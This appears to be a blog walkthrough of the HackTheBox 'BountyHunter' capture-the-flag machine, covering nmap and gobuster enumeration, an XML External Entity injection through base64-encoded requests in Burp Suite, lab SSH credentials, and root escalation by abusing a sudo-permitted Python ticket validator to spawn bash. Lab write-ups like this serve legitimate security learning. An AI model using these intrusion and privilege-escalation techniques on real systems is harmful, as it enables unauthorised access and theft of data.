In this post, I would like to share a walkthrough of the BountyHunter Machine from HackTheBox

This room has been considered difficulty rated as an Easy machine on HackThebox

Source: BountyHunter icon

What will you gain from the BountyHunter machine?

For the user flag, you will need to locate an XML External Entity vulnerability on the website here you will get user privileges to access via BurpSuite

As for the root flag, you will need to find the SUID file permission that we can use to escalate to the root. From there, we need to create a ticket code file where it will execute the command of our choice

Information Gathering

Once we have started the VPN connection which requires to download from Hackthebox, we can start the information gathering on the machine by executing the command nmap -sC -sV -p- <IP Address> -PN 

Let’s open the browser and straight into the website interface.

On the website interface, we didn’t see any useful information for any escalation to the server.

However, we did see the Portal Link where it re-directs to a different webpage. There’s a here link that appears as shown in the screenshot above.

Gaining Privileges Access

A website interface such as Bounty Report System – Beta will appear just like the screenshot above.

Let’s test the beta system by inserting a single character on the Bounty Report System Beta website

Based on the result found during the burp suite activity, we managed to notice that data have been base64 encode

As a result, we can sight there’s an XML code from decoded the base64

I have done some research on XML External Entity Injection and some of the resources is extremely useful to us in the future.

Let’s run gobuster tool to enumerate further for any file or directory. The command that we can use in this activity is as below:

gobuster dir -u <ip> -w /<Path to>/Seclists/Discovery/Web-Content/big.txt

We have failed to get any files that look interesting to us.

Let’s run again gobuster but with an additional command (-x php) this time. It does resulting show a few PHP file extensions stored in the website such as db.php, index.php and more.

Why search for PHP files on the website?

It’s because I did notice there’s a file extension of PHP when browsing to Portal webpage.

We will encode the XML code into base64 code using the CyberChef Interface such as shown above.

We need to copy-paste the base64 code that we obtain from the CyberChef website on the data= at the bottom of the Request Packet. The Response that we will be retrieving can be seen in the Response column

We need to modify the XML code and need to encode it into Base64 code so that we can do the same process as previously.

In the title column, we can see some base64 code which we should decode so that we can fully read the code in plain text

We managed to get the password while decoding the base64. However, we are still clueless about the username and password that we obtained recently

The credentials that we have gotten such as below:

username:  development
password: m19RoAU0hP41A1sTsq6K

Maintaing Priviliges Access

After looking carefully at the Nmap result, I notice that the SSH service port is open, and let’s access the machine via SSH service using the credentials above

Voila! We managed to access the machine.

We can read the user flag by executing the “cat user.txt” command

Escalate to Root Privileges Access

We should be able to find out the SUID file that can be used to escalate to Root by executing the command “sudo -l

Let’s create the code and save it as anyname.md

We should be able to read the root flag by executing the command “sudo /usr/bin/python3.8 /opt/skytrain_inc/ticketValidator.py

We need to enter the file that we saved earlier.

Another alternative to get a root flag is by changing the command ‘cat /root/root.txt” to ‘bash

You just need to read the root flag from /root/ Directory and enter the flag on the BountyHunter submit flag column

-THE END-

Happy Learning Guys!

Extra Information

We can go to /etc/shadow to unlock the write-up

Categories:

One response

Leave a Reply

Your email address will not be published. Required fields are marked *